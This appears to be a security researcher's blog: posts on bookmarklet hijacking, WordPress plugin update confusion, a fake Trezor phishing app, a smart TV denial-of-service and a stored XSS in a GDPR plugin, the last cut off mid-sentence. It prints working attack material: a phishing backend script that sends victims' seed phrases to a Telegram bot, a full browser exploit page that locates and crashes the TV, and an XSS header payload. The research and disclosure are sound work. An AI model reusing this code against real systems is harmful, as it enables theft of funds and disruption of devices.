The security engineering mind got me thinking about the security implications of saving bookmarks with JavaScript from other websites, especially when readers share links to the GitHub gists.
We already know executing any non-trusted JavaScript is a wrong move. People were being tricked into pasting stuff into the browser console on popular websites and got hacked that way. There were even massive phishing campaigns using malicious bookmarklets against Discord users.
But what if the victim is cautious and examines the content of bookmarklet JS before saving them to bookmarks? People often hover over links to see if they lead to malicious sites.
So, I was thinking about changing the content before the user saved it to bookmarks and was experimenting with the ondragstart Event. I came up with a very simple Proof of Concept for Chromium-based browsers and Firefox - https://gist.github.com/vavkamil/0b167814cabf8787cd4c4ab629614c6e.
It’s a simple PoC where the href attribute specifies the link’s destination:
javascript: (() => { alert(1); })();
And after saving to bookmarks, it changes to:
javascript: (() => { alert(2); })();
You can see it here: https://xss.vavkamil.cz/bookmarklet.html
<html>
<head>
<title>Bookmarklet hijacking PoC</title>
</head>
<body>
<h1>Bookmarklet hijacking</h1>
<h2>Chromium Proof of Concept</h2>
<h3>Steps to reproduce</h3>
<p>1. <strong>Double-check that the link executes</strong> <code>alert(1)</code></p>
<p>2. <strong>Drag & drop the link to Bookmarks (tool)bar</strong></p>
<p>3. <strong>Double-check that the link executes</strong> <code>alert(1)</code></p>
<p>4. <strong>Click the link in Bookmarks; it executes</strong> <code>alert(2)</code></p>
<br>
<a href="javascript: (() => { alert(1); })();" id="myLink" draggable="true">Save this cool bookmarklet!</a>
<script>
const linkElement = document.getElementById('myLink');
const originalLink = linkElement.href;
linkElement.addEventListener('dragstart', function(event) {
const newLink = "javascript: (() => { alert(2); })();";
event.target.href = newLink;
// Set the data for the drag event to the new link
event.dataTransfer.setData('text/uri-list', newLink);
event.dataTransfer.setData('text/plain', newLink);
console.log('Link location changed to:', event.target.href);
});
linkElement.addEventListener('dragend', function(event) {
// Reset the link back to its original value after the drag operation has ended
event.target.href = originalLink;
console.log('Link location reset to:', event.target.href);
});
</script>
<hr>
<h2>Firefox Proof of Concept</h2>
<h3>Steps to reproduce</h3>
<p>1. <strong>Double-check that the link executes</strong> <code>alert(1)</code></p>
<p>2. <strong>Right-click & Bookmark link... & Save</strong></p>
<p>3. <strong>Double-check that the link executes</strong> <code>alert(1)</code></p>
<p>4. <strong>Click the link in Bookmarks; it executes</strong> <code>alert(2)</code></p>
<br>
<a href="javascript: (() => { alert(1); })();" id="myLink_2">Save this cool bookmarklet!</a>
<script>
const linkElement_2 = document.getElementById('myLink_2');
const originalLink_2 = linkElement_2.href;
linkElement_2.addEventListener('mousedown', function(event) {
const newLink = "javascript: (() => { alert(2); })();";
event.target.href = newLink;
console.log('Link location changed to:', event.target.href);
});
linkElement_2.addEventListener('mouseover', function(event) {
// Reset the link back to its original value after the drag operation has ended
event.target.href = originalLink;
console.log('Link location reset to:', event.target.href);
});
</script>
</body>
</html>
I recently did a regular secure code review of one WordPress instance and noticed a new internally developed plugin. It occurred to me that if an attacker would be able to impersonate the plugins’ slug and upload a malicious version to the WordPress Plugin Directory, we might see an update notification if the SVN version is bumped to a higher one than is used.
That would introduce the “Confused deputy problem” attack scenario, where the privileged user, instructed to update all plugins regularly, inadvertently infects the instance with malware.
One could argue that the confused deputy shouldn’t blindly update plugins without checking the changelog first, but to be honest, the updates are released so often it quickly becomes monotonous. And we shouldn’t put them in that position in the first place, as it’s security through obscurity, believing that an outside attacker can’t figure out the plugin’s name.
To confirm the hypothesis, I began to research if it’s, in fact, a possible attack vector and how widespread it is.
WordPress.org offers free hosting to anyone who wishes to develop a plugin. All code in the directory should be as secure as possible, but security is the ultimate responsibility of the plugin developer.
The WordPress.org plugins directory is the easiest way for potential users to download and install any plugin. Once a new plugin is approved, a developer gets access to an (SVN) Subversion Repository. The SVN repository is a release repository, not a development one. All commits, code, or readme files, will trigger a regeneration of the zip files associated with the plugin.
WordPress’ integration with the plugin directory means the user can update the plugin in a couple of clicks. Users are alerted to updates when the plugin version in SVN increases.
In theory, anyone following the guidelines and passing the review process can upload the plugin and distribute the malicious version later. Unfortunately, while reading the developer documentation, I found the following info:
Why is my submission failing saying my plugin name already exists? You’re trying to use a plugin with a permalink that exists outside WordPress.org and has a significant user base. It’s important to understand that the way the plugin update API works is that it compares the plugin folder name (i.e. the permalink) to every plugin it has hosted on WordPress.org. If there’s a match, then it checks for updates and users are prompted to upgrade. When that happens, users of the ‘original’ plugin (the one we don’t host) would upgrade to the one from WordPress.org and, if that isn’t what you actually wanted to do, you could break their sites. Sometimes this situation develops when a company or person releases their plugin privately (via Github for example) and decides they want to re-release it on WordPress.org. In those cases, we recommend you email us and we’ll walk you through how to get past the error.
Implying that WordPress’ Security team is internally tracking all the unclaimed plugin names used in the wild, number of installations, and there is some magic threshold value preventing a large-scale supply chain attack. But it also validates the assumption that the attack vector is indeed possible.
Most business websites using WordPress have a custom theme, and the slug name is almost always in the HTML source code to load JS/CSS files from the theme’s asset directory. Detecting the theme slug and taking over the unclaimed ones would be the easiest way.
WordPress Theme Directory does have a rigorous Theme Review Process & Theme Review Requirements, to ensure quality and security. New themes are generally put to a higher standard to attract new users.
It would be hard for me to develop a frontend appealing to a general audience and pass the review, so I decided not to worry about them.
On the other hand, it’s impossible to detect most plugins via a passive check, and it will be tough to create a custom wordlist. But the review process for WordPress Plugin Directory is not that strict, and the guidelines are relatively simple.
While reading the docs, I was mainly interested in the restrictions for plugin names. Being already familiar with WordPress, I knew that the slug name could only contain lowercase alphanumeric characters divided by dash, but I also learned there are more restrictions:
Plugins must respect trademarks, copyrights, and project names. Names cannot be “reserved” for future use or to protect brands. The use of trademarks or other projects as the sole or initial term of a plugin slug is prohibited unless proof of legal ownership/representation can be confirmed. This policy extends to plugin slugs, and we will not permit a slug to begin with another product’s term.
That threw me off because apparently, there is a check for trademarked brands, which will protect most companies and prohibit uploading unclaimed plugins (assuming they use their company name as a prefix for internal plugins). I didn’t want to give up yet, so I started digging around, and it turns out the WordPress team is a fan of transparency, and the whole approval process is automated and, most importantly, fully open-sourced.
By reviewing the [class-upload-handler.php](https://meta.trac.wordpress.org/browser/sites/trunk/wordpress.org/public_html/wp-content/plugins/plugin-directory/shortcodes/class-upload-handler.php)
checks, we can see a couple of essential functions:
process_upload()
88 $this->plugin_slug = remove_accents( $this->plugin['Name'] );
89 $this->plugin_slug = preg_replace( '/[^a-z0-9 _.-]/i', '', $this->plugin_slug );
90 $this->plugin_slug = str_replace( '_', '-', $this->plugin_slug );
91 $this->plugin_slug = sanitize_title_with_dashes( $this->plugin_slug );
has_reserved_slug()
388 public function has_reserved_slug() {
389 $reserved_slugs = array(
390 // Plugin Directory URL parameters.
391 'about',
392 'admin',
393 'browse',
394 'category',
395 'developers',
396 'developer',
has_trademarked_slug()
430 public function has_trademarked_slug() {
431 $trademarked_slugs = array(
432 'adobe-',
433 'adsense-',
434 'advanced-custom-fields-',
435 'adwords-',
436 'akismet-',
437 'all-in-one-wp-migration',
438 'amazon-',
439 'android-',
440 'apple-',
441 'applenews-',
442 'aws-',
Surprisingly, big enough (FAANG) style companies can request to add themselves to the list ($trademarked_slugs
) of prohibited terms, and any uploads of plugins containing that name will automatically fail. Most importantly, there is also the check preventing uploads using popular plugin names already used in the wild:
231 if ( function_exists( 'wporg_stats_get_plugin_name_install_count' ) ) {
232 $installs = wporg_stats_get_plugin_name_install_count( $this->plugin['Name'] );
233
234 if ( $installs && $installs->count >= 100 ) {
235 $error = __( 'Error: That plugin name is already in use.', 'wporg-plugins' );
In conclusion, the WordPress Plugin Confusion attack against internally developed plugins on business websites is indeed possible. Still, the security mechanism prevents large-scale supply chain attacks against unclaimed plugins installed on more than 100 websites.
I wrote a simple tool wp_update_confusion.py, which will passively detect any plugins from the front page response and check if the plugin name contains only the allowed characters. It then pings the WordPress SVN to verify if the slug is already claimed or not.
While scanning websites of HackerOne public bug bounty programs, it was reporting a ton of false positives. I quickly realized that it would be impossible to get any meaningful output without a database of paid WordPress plugins. And building one by myself would require a significant amount of time.
Instead of reinventing the wheel and knowing from the review process code that the WordPress team already has the data, I started looking around the website. Every plugin has an “Advanced View” tab, where one can see various graphs, such as active versions, downloads per day, install growth, etc.
Poking around the API revealed one publicly available endpoint, which in fact, returns all_time number of downloads for any unclaimed plugin slug:
https://api.wordpress.org/stats/plugin/1.0/downloads.php?slug={plugin_name}&historical_summary=1
In the end, having all the information needed to verify if we could take over the plugin resulted in much better results. Although I didn’t implement a brute-force option, which would be the best way how to earn bug bounties, so right now, it is only capable of detecting low hanging fruits :)
The way it works is:
1) Query the front-page and find all the plugins re.findall("wp-content/plugins/(.*?)/", html)
2) Check if the slug is allowed
3) Check if the slug is present in the SVN registry
4) Check if the slug is installed on more than 100 websites
5) Profit?
The next step was to debug how the plugin mechanism exactly works. The easiest solution would be to review the code, but since I’m not that familiar with PHP, a black-box style test sounded like a better idea.
Since I like Burp Suite a lot, I decided to intercept the requests between the website and wordpress.org API
via its proxy. Running the WordPress in Docker container is easy, but installing the SSL cert and routing all the external traffic via Burp wasn’t that simple.
After a lot of debugging, I came up with the following:
1) Configure Proxy Listener
to listen on all interfaces
2) Add IP address of the Proxy as extra_hosts
in docker-compose.yml
3) Run docker
and install the WordPress via wp-cli
4) Download & install Burp Suite certificate
#!/usr/bin/env sh
# Download & install Burp Suite certificate
wget -q http://burp:8080/cert -O cert.der
openssl x509 -in cert.der -inform DER -out cert.pem
mkdir /usr/local/share/ca-certificates/extra
cp cert.pem /usr/local/share/ca-certificates/extra/cert.crt
update-ca-certificates
rm cert.der cert.pem
5) Redirect all requests received by listener to my host
6) Replace all occurrences of *api.wordpress.org*
to my host
You can see the final script here: https://github.com/vavkamil/wp2burp
After that, I could see that when the websites is checking if there are any updates available, it issues the following request:
POST /plugins/update-check/1.1/ HTTP/2
Host: api.wordpress.org
User-Agent: WordPress/5.3; http://127.0.0.1:31337/
Accept: */*
Accept-Encoding: gzip, deflate
Referer: https://api.wordpress.org/plugins/update-check/1.1/
Connection: close
Content-Length: 1778
Content-Type: application/x-www-form-urlencoded
Expect: 100-continue
plugins={...}
Where the JSON data contains a list of all installed plugins, e.g.:
{
"akismet\/akismet.php":{
"Name":"Akismet Anti-Spam",
"PluginURI":"https:\/\/akismet.com\/",
"Version":"4.1.3",
"Description":"Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam<\/strong>. It keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key.",
"Author":"Automattic",
"AuthorURI":"https:\/\/automattic.com\/wordpress-plugins\/",
"TextDomain":"akismet",
"DomainPath":"",
"Network":false,
"RequiresWP":"",
"RequiresPHP":"",
"Title":"Akismet Anti-Spam",
"AuthorName":"Automattic"
},
If there is a new version available, the websites received the following response:
HTTP/2 200 OK
Date: Sun, 10 Oct 2021 19:13:57 GMT
Content-Type: application/json
Access-Control-Allow-Origin: *
Cf-Cache-Status: DYNAMIC
Expect-Ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NpTdm3rT6Twj%2FvltPnM2Lb627HEIH4tcXE%2FTqUW0ZSqB7QQlDef1ttcmizy5cx2qcGwpKR%2BmudmYA0tp0G5QVEJ8G4%2Fu%2Bh07GKDQfbBYlJext3lDiKXRNB0EHIi3lD35oLk%3D"}],"group":"cf-nel","max_age":604800}
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Cf-Ray: 69c22b4018442794-PRG
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
{"plugins":{"akismet\/akismet.php":{"new_version":"4.2.1","package":"https:\/\/downloads.wordpress.org\/plugin\/akismet.4.2.1.zip"}}}
If you click on the update button, WordPress deletes the contents of the old plugin directory, and the .zip file containing a new version is downloaded and unzipped, effectively replacing all the files. Ethically exploiting this is tricky because, with any Proof of Concept, you will break the website.
But using the docker container to intercept and simulate the attack might be enough, as you can modify the response, so it will contain any version & remote zip file you want:
I didn’t want to claim anyone’s plugin, as the update would inadvertently break the website (old plugin files will get deleted). Still, I had to simulate the attack to confirm that it works.
Fortunately for me, I already wrote a simple WP plugin two years ago, “XML-RPC Settings” to understand how the various “xmlrpc.php” attack vectors work and how to defend against them. I never bothered to upload it to WordPress Plugin Directory, but there was a possibility that someone installed it from my GitHub. For example, it was on this blog before I migrated to GitHub pages. To be sure, I installed the plugin on six different websites a while ago when I was thinking about starting this research.
After reading WordPress developer guidelines and updating the readme, I submitted the plugin for review. The exact timeline was:
One hour after the plugin was approved, I was granted commit access to your Subversion (SVN) repository and uploaded my plugin:
$ sudo apt-get install subversion
$ svn co https://plugins.svn.wordpress.org/xml-rpc-settings wordpress/
$ cp xml-rpc-settings/* wordpress/.
$ cd wordpress
$ svn add trunk/*
$ svn ci -m 'feat(xml-rpc-settings): Add plugin files'
Like that, I released the plugin; now, I had to wait until the WordPress Plugin Directory synced with SVN. After a while, I noticed a Wordfence Slack notification, telling me that it found a problem on a couple of websites and a new plugin update is available; bingo!
I was able to hijack a plugin installed on a couple of websites. Although there isn’t any backdoor, actually you can check the plugin:
https://wordpress.org/plugins/xml-rpc-settings
On the other hand, an attacker could now have a foothold into the website. Even worse, if the website admin enables automatic plugins updates, introduced in WordPress 5.5. That would allow the attacker to change plugin files anytime they wanted, without any user interaction.
As this is essentially vulnerable by design, I wouldn’t expect the fix from the WordPress side. If you are a big enough company, you can contact them and get your trademark in the $trademarked_slugs
list. Since uploading a “dummy” plugin to the registry is not allowed, one must find another way. You can follow a couple of recommendations to keep your site secured.
The theme slug is the name of the theme in lower case, with spaces replaced by a hyphen (-). It is also the folder name for the theme. The themes team can decline themes based on the name and request that the name is changed if they decide that the name is inappropriate or too similar to an existing theme or brand.
That means that you can rename your custom theme in the following way: theme-internal_name
to be on the safe side.
WordPress 5.8, released on July 20, 2021, introduced a new “Update URI” plugin header.
This allows third-party plugins to avoid accidentally being overwritten with an update of a plugin of a similar name from the WordPress.org Plugin Directory.
It effectively gives the website maintainer an effective way to prevent the supply chain attack, as the internal plugin will never ask for updates.
The main PHP file should include the header comment Update URI: false
, example:
<?php
/**
* Plugin Name: Internal Plugin
* Version: 1.0
* Update URI: false
*/
You can read the full announcement here: https://make.wordpress.org/core/2021/06/29/introducing-update-uri-plugin-header-in-wordpress-5-8/
If you can’t, for any legacy reasons, update to WordPress 5.8, and use the Update URI
mitigation, you still have some options:
The plugin slug can only contain lower case alphanumeric characters and dash as a delimiter. Some of the keywords are prohibited as well, which could help us in this case. That means that you can rename your custom plugins in the following ways:
internal_plugin_name
InternalPluginName
wp-internal-plugin-name
It is also possible to leverage a hook and write a custom update function, blocking the internal WP API call and replacing it with your own, similar to how a paid plugin offers custom updates from their servers.
Some plugins do that for you, for example, Easy Updates Manager, which allows you to block updates for specific plugins.
That being said, you should always create a fresh backup and read the changelog before updating any plugins.
Since I don’t have my own recon DB anymore, I dumped about 200k subdomains from Chaos (public HackerOne programs with bounties) and scanned them with httpx:
httpx -random-agent -l chaos_all_hackerone.txt -match-string "wp-content" -o httpx_wordpress.txt
That resulted in approximately 427 WordPress websites. After verifying them with the Proof of Concept wp_update_confusion.py
tool, I found 13 potential targets. That is not bad, considering the [8.2 High](https://chandanbn.github.io/cvss/#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:L)
severity.
After carefully reading the policy of each bug bounty program, I found out that more than half (7) of the potential targets are out of scope. That’s a bummer, as some belong to well-known companies, and they will probably fix it anyway after I release this research.
Either way, I ended up submitting six reports. One of them is the VDP program (not offering bounties).
https://twitter.com/vavkamil/status/1447160385954533378
After sharing the screenshot of redacted submitted reports with a #0day hashtag on Twitter, I received a message from @naglinagli offering a collaboration. The offer was access to his extensive recon database to scan the host with my payload in exchange for splitting any future bug bounty payouts.
Since Nagli is usually in the top 5 researchers with the highest HackerOne reputation, I decided to take the offer. Mainly to see how many vulnerable websites might be there. Giving away 50% of potential bounties might be somewhat expensive, but I was pretty much done with the scan anyway.
On the first try, we found more than twice as many vulnerable hosts as my previous scan attempt. I must say that the collaboration was awesome, I was impressed by how many high-profile targets he was able to find.
All in all, we submitted close the 25 reports. Unfortunately, a lot of them were closed as Informative. Some argued that their release process would not update the plugins, most likely thanks to CI/CD automation. Some didn’t understand the report, and some closed it because it was missing a clear Proof of Concept, arguing that it’s only a theoretical issue.
But others appreciated the submission, applied a fix, and one company even awarded us with a bonus for the quality of the report. You can see example of the report here: https://hackerone.com/reports/1364851
We ended up with approximately $4k in bounties, but most importantly, we made the Internet a little bit safer. It was very eye-opening how many top tech and world-known companies were potentially affected.
This research was presented as a talk at the OWASP Czech Chapter meeting on 25th November 2021.
A story about a person losing 7.1 bitcoin worth ~$600,000 due to a fake “Trezor” app in the App Store made the news very recently. According to the article, five people have reported having cryptocurrency stolen by the fake Trezor app on iOS, for total losses worth $1.6 million.
I saw another fake Trezor app pop-up on Google Play Store yesterday. People on Reddit were downloading the app to see what it does and to warn others. That caught my attention because it’s generally not a good idea to install something like this blindly.
The Play Store listing had an almost five-star rating, a couple of primarily fake reviews, and around ~500 downloads. It looked somewhat believable to the casual user.
I pulled the .apk file from Play Store and decompiled it. From the first look, it was not malware, which was good.
$ sha256sum mobile-wallet-trezor-io_1.0.apk 1cc9a9748ccd210fb8aa06b1ae5b48ca3805eed12c670818a75e833733376b7f
In the “/sources/com/rzor/p034tr/MainActivity.java” file on line 206, we could see this message:
MainActivity.this.mo4371l0("This app is created using an unauthorized copy of 'Website 2 APK Builder Pro' Software.", "Unauthorized App", "Shame on me!");
And on the line 1196:
this.f2862z = "https://sliu3err-restaurant.com";
So the Android application was just a WebView for the phishing website. The only functionality was to enter the 12/24 backup word phrase to connect the Trezor. Anyone who uses Trezor should know that you are never supposed to enter it anywhere, but sadly, people are still falling for it.
Warning to all Trezor owners using Android devices!
— Trezor (@Trezor) January 18, 2021
This app is malicious and has no relation to Trezor or SatoshiLabs. Please, don't install it.
Remember that you should never share your seed with anyone until your Trezor device asks you to do it! pic.twitter.com/6C3iKfPDnR
After getting access to the web server, just to look around and see how the backend works, I was surprised by how basic it was. In the “index.php” file was an IP logger:
<?php
$dir = 'vixrs';
if(!is_dir($dir)){ mkdir($dir,0777);
}
$file = date('Y-m-d').'.txt';
$ip = $_SERVER['REMOTE_ADDR'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$ipInfo = grabIpInfo($_SERVER["REMOTE_ADDR"]);
$filename = $dir.'/'.$file;
$url = "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
$info = '
===========================
IP: '.$ip .'
Browser: '.$browser .'
Ipinfo: '.$ipInfo .'
Time: '.date('d/m/Y H:i:s a').'
Filename: '.basename($_SERVER['PHP_SELF']).'
URL: '.$url.'
';
file_put_contents($filename, $info, FILE_APPEND);
function grabIpInfo($ip)
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, "http://ipwhois.app/json/$ip");
curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
$returnData = curl_exec($curl);
curl_close($curl);
return $returnData;
}
$ipJsonInfo = json_decode($ipInfo);
?>
And in the “seed.php” file was the passphrase logger:
<?php
$token = "16308!REDACTED!NyZV60tUX5ptudhtnSLj_nBNdo";
$data = ["text" => $_POST['seed'],'chat_id' => '-59!REDACTED!38'];
file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data) );
return true;
?>
Essentially, when the victim installed the Android app and entered the Trezor seed passphrase, the Telegram bot immediately sent it to the encrypted group chat. And the scammers began the recovery phase to empty the cryptocurrency balance.
While having access to the Telegram API token, I invited myself to the chat group. Unfortunately, I or the bot couldn’t see previous messages, so all I could do was say hello to the scammer. Their name was “Pinern nuere” with the username “caerwe3423”.
There was nothing more to do, so I just disabled the bot, so it no longer could forward the passphrases and called it a night. In the morning, the fake app was no longer on Play Store, so mission accomplished.
Since I grabbed the IP logs from a couple of days, I can share some stats. The backend was reused for all the variations of the scam. Most of the hits were from phones, with a wide range of Android versions worldwide:
Day one:
Day two:
Day three:
Day four:
Day five:
I don’t know how many of them were compromised, but hopefully zero.
https://play.google.com/store/apps/details?id=com.tzr.trz2
I bought myself a smart TV for Christmas. It’s the first TV which I ever owned, so I was quite excited about it, but at the same time, I didn’t want something fancy. It was hard to find something with 4k resolution without a camera/microphone and unnecessary functions, potentially increasing the attack surface. I ended up buying an ordinary one with YouTube & Netflix support (SRT 43UB6203 (43”/108 cm) - 10 bit).
After unboxing and setting it up, the first thing which I did was a firmware update. The latest software version is:
Current version: V8-MS586EU-LF1V104
Product name: 43D1901
Date: May 23 201908:38:07
After the update, I continued with an nmap scan to see which (if any) ports are exposed:
vavkamil@xexexe:~$ nmap -p- 10.10.10.249
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-07 19:05 CET
Nmap scan report for 10.10.10.249
Host is up (0.0064s latency).
Not shown: 65525 closed ports
PORT STATE SERVICE
4123/tcp open z-wave
5978/tcp open ncd-diag-tcp
8989/tcp open sunwebadmins
51604/tcp open unknown
52091/tcp open unknown
54656/tcp open unknown
55028/tcp open unknown
55683/tcp open unknown
55699/tcp open unknown
61414/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 6.90 seconds
I don’t know if that’s normal or what I was even expecting, but I was more interested in looking into some web interface since I do mostly web security stuff. Unfortunately, after trying each IP:port combination in the browser, there wasn’t anything useful.
So I tried Burp Suite’s “Discovery content” scan from the “Engagement tools” section. Some ports were not responding at all, or there were some XML configs - most likely for the FastCast/Miracast feature (UPnP/1.0 AwoX/1.1) to cast YouTube videos from the phone. I then hit the jackpot and found what I was looking for, the “admin” panel without any authentication.
Looking at the Media Renderer Administration web interface, I was confident that I found a command injection and possible RCE. It’s an endpoint to change Friendly Name, which is used to discover the TV and is visible during casting, and it says:
Note: You can use the %hostname% variable as a placeholder for the actual device hostname.
I precisely followed the instructions and set the Friendly Name as %hostname%. To my surprise, it didn’t work, and the TV completely froze instead. The TV remote stopped working, and the whole thing became unresponsive. Even the hardware buttons at the bottom did nothing. At that point, I was pretty much disappointed, as I thought that I just bricked my one-hour-old television.
Only after unplugging the power cord to do the hard reset, it returned to normal. I continued messing up with the command injection payloads, but it ended up with a Denial of Service (DoS) every time. Just a note that after each restart, the web interface is listening on a different dynamic port (49152 - 65535), so one has to repeat the recon phase.
At that point, I summarized my notes and reached to a vendor via the contact form on their website.
After a couple of days passed, I spent an evening writing a Proof of Concept to confirm that the issue is remotely exploitable. The first step was to determine the internal IP range. WebRTC leak didn’t work for me, but since I also own Philips Hue smart light bulbs, I decided to work with that. Thanks to the CORS “misconfiguration”, any website you visit can check the internal IP address of your Hue Bridge. You can see the source code or PoC for that here.
vavkamil@xexexe:~$ curl -v -s https://discovery.meethue.com/
...
< HTTP/2 200
< access-control-allow-credentials: true
< access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, X-Token, X-Bridge
< access-control-allow-methods: GET, OPTIONS
< access-control-allow-origin: *
< cache-control: no-cache
< content-type: application/json; charset=utf-8
< content-length: 63
< via: 1.1 google
< alt-svc: clear
<
[{"id":"ecb5fafffe128375","internalipaddress":"10.10.10.253"}]
* Connection #0 to host discovery.meethue.com left intact
After discovering the internal IP range, we can leverage the fact that there is always a service listening on port 4123 and do a port scan for that. Thanks to the lack of X-Frame-Options, we can try to load each IP:port pair in an iframe. Unfortunately, the connection to port 4123 will hang out, but it will eventually load after 1:30 minutes (at least in Mozilla Firefox). We can either wait or use a timer on the iframe to detect that it’s loading.
vavkamil@xexexe:~$ curl http://10.10.10.249:4123
curl: (1) Received HTTP/0.9 when not allowed
vavkamil@xexexe:~$ telnet 10.10.10.249 4123
Trying 10.10.10.249...
Connected to 10.10.10.249.
Escape character is '^]'.
<?xml version="1.0" encoding="utf-8"?><root><response>true</response></root>
Once we know the smart TV’s internal IP address, we have to scan all of its dynamic ports to find the Media Renderer Administration. I used the same technique, which is popular in the Router Exploit Kits, loading the admin panel logo in the <img>
tag. Then it’s just a matter of sending one unauthenticated GET request to cause a Denial of Service until the power cord is unplugged:
http://{IP:PORT}/web/admin/setFriendlyName?name=%hostname%
The Proof of Concept code is very messy and could be optimized to be much faster, but it works :)
<html>
<head>
<title></title>
</head>
<body>
<h1>Strong TV DoS exploit</h1>
<h2>Proof of Concept</h2>
<label for="internal_ip">Any internal IP:</label>
<input type="text" name="internal_ip" id="internal_ip" autocomplete="off" onchange="get_tv_ip()">
<br><br>
<label for="tv_ip">Smart TV IP:</label>
<input type="text" name="tv_ip" id="tv_ip" autocomplete="off" onchange="scan_tv_ports()">
<br><br>
<label for="tv_port">Smart TV Port:</label>
<input type="text" name="tv_port" id="tv_port" autocomplete="off"> <em>This may take a couple of minutes</em>
<br><br>
<label for="web_admin">Media Renderer Administration:</label>
<input type="text" name="web_admin" id="web_admin" autocomplete="off">
<br><br>
<label for="exploit_code">Exploit code:</label>
<textarea name="exploit_code" id="exploit_code" autocomplete="off" style="width:680px;height:130px;"></textarea>
<br><br>
<label for="exploit_poc">Exploit:</label>
<a href="#" name="exploit_poc" id="exploit_poc" target="_blank">Proof of Concept</a>
<br><br>
<script>
get_hue_ip();
async function scan_tv_ports(ip) {
var check = 0;
// dynamic ports 49152 - 65535
var ports = get_ports_array(49152,65535);
for (var i = 0; i < ports.length; i++) {
if(check != 0) { break; }
await new Promise(resolve => setTimeout(resolve, 50));
var img = document.createElement("img");
img.setAttribute("src", "http://"+ip+":"+ports[i]+"/web/file/largeIco.jpg");
img.style.width = "10px";
img.style.height = "10px";
//img.style.display = "none";
img.id = ports[i];
img.name = ip;
img.onload = function () {
check = 1;
document.getElementById("tv_port").value = this.id;
document.getElementById("web_admin").value = "http://"+this.name+":"+this.id+"/web";
var code = "\
<script>\n\
function submitRequest() {\n\
var xhr = new XMLHttpRequest();\n\
xhr.open('GET', '"+"http://"+this.name+":"+this.id+"/web"+"/admin/setFriendlyName?name=%hostname%', true);\n\
xhr.send();\n\
}\n\
submitRequest();\n\
<\/script>";
document.getElementById("exploit_code").value = code;
document.getElementById("exploit_poc").href = "http://"+this.name+":"+this.id+"/web"+"/admin/setFriendlyName?name=%hostname%";
console.log(this.id);
};
document.body.appendChild(img);
setTimeout(function () {
this.continue;
}, 50);
}
var imgs = document.querySelectorAll('img');
for (var i = 0; i < imgs.length; i++) {
imgs[i].parentNode.removeChild(imgs[i]);
}
}
function get_tv_ip() {
var local_ip = document.getElementById("internal_ip").value;
var ips = ip_to_range(local_ip);
scan(ips);
}
function get_hue_ip() {
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://discovery.meethue.com/")
xhr.send();
xhr.onreadystatechange = function(e) {
var hue_ip;
if (xhr.readyState === 4) {
var response = xhr.responseText;
var obj = JSON.parse(response);
hue_ip = obj[0].internalipaddress;
document.getElementById("internal_ip").value = hue_ip;
get_tv_ip();
}
}
}
function ip_to_range(ip) {
var ips = [];
var ip_parts = ip.split( '.' );
if( ip_parts.length !== 4 ) {
return false;
}
for( var i = 1; i < 255; i++ ) {
var tmp_ip = ip_parts[0] + '.' + ip_parts[1] + '.' + ip_parts[2] + '.' + i;
ips.push( tmp_ip );
}
return ips;
}
function get_ports_array(lowEnd, highEnd) {
var ports = [];
for (var i = lowEnd; i <= highEnd; i++) {
ports.push(i);
}
return ports;
}
function scan(ips) {
for (var i = 0; i < ips.length; i++) {
var ifrm = document.createElement("iframe");
ifrm.setAttribute("src", "http://"+ips[i]+":4123");
ifrm.style.width = "10px";
ifrm.style.height = "10px";
ifrm.id = ips[i];
ifrm.onload = function () {
var iframes = document.querySelectorAll('iframe');
for (var i = 0; i < iframes.length; i++) {
iframes[i].parentNode.removeChild(iframes[i]);
}
document.getElementById("tv_ip").value = this.id;
scan_tv_ports(this.id);
};
document.body.appendChild(ifrm);
setTimeout(function () {
this.continue;
}, 50);
}
}
</script>
</body>
</html>
The following example is accelerated. The full port scan phase can take up to 5 - 10 minutes. However, it’s because the PoC is not optimized for speed.
If the attacker is already in the same network as the smart TV, it would be much faster and easier to use Nmap or something like that.
Honestly, I didn’t have much time to do even a network scan or motivation to reverse engineer the firmware, but I believe there is much more to uncover. It would be an excellent topic for further research. I guess it’s just a matter of time until we see the first Smart TV Exploit Kit.
I decided to drop this one as a 0day since I couldn’t convince the vendor to release a fix in the past 90 days. Users can move smart appliances to a separate VLAN to be safe. Other than that, the TV itself is not that bad, and I’m somewhat satisfied with the purchase.
I have just recently joined a Detectify crowdsource team, and I must say the platform is impressive. So I promised myself that I would spend some of the weekends looking for WordPress vulnerabilities to contribute with modules to the scanner. For the vulnerability to be accepted, the plugin must have at least 200k installations.
I started browsing popular WP plugins, looking for ones that meet the criteria. After a while, I saw a GDPR plugin with 200,000+ active installations, and it caught my attention because I remember that there were some with critical vulnerabilities when the whole cookie consent thing was made mandatory and developers were racing with new plugins.
After checking the plugin page, too see if there is any attack surface, one screenshot was interesting:
The description said: Overview of the view and delete requests by your site’s visitors., which indicated a dashboard in the admin panel with GDPR “delete requests” results, including the Email and IP Address of the user, could be a potential attack vector.
After downloading the plugin and activating it in the DVWP docker container, I published a page (with the form) to request deleting the user data and begin the black-box testing. Validation of the e-mail input was correct, but when I tried to spoof the IP address via X-Forwarded-For: 1.1.1.1"><img src=x onerror=alert(1)>
, the XSS payload executed. What a surprise, it took me less than 10 minutes to find a “Blind XSS” vulnerability triggered in the context of a privileged user.
At that point, I finished the testing, and I quickly moved to a source code review to locate the vulnerable code and continue with the white-box testing. Quick grep command revealed a database column `ip_address` varchar(255) NOT NULL
, which was a nice surprise to see because thanks to that, it was possible to store the whole XSS payload. The IP address from the form is assigned being via $request->setIpAddress(Helper::getClientIpAddress());
and the getClientIpAddress()
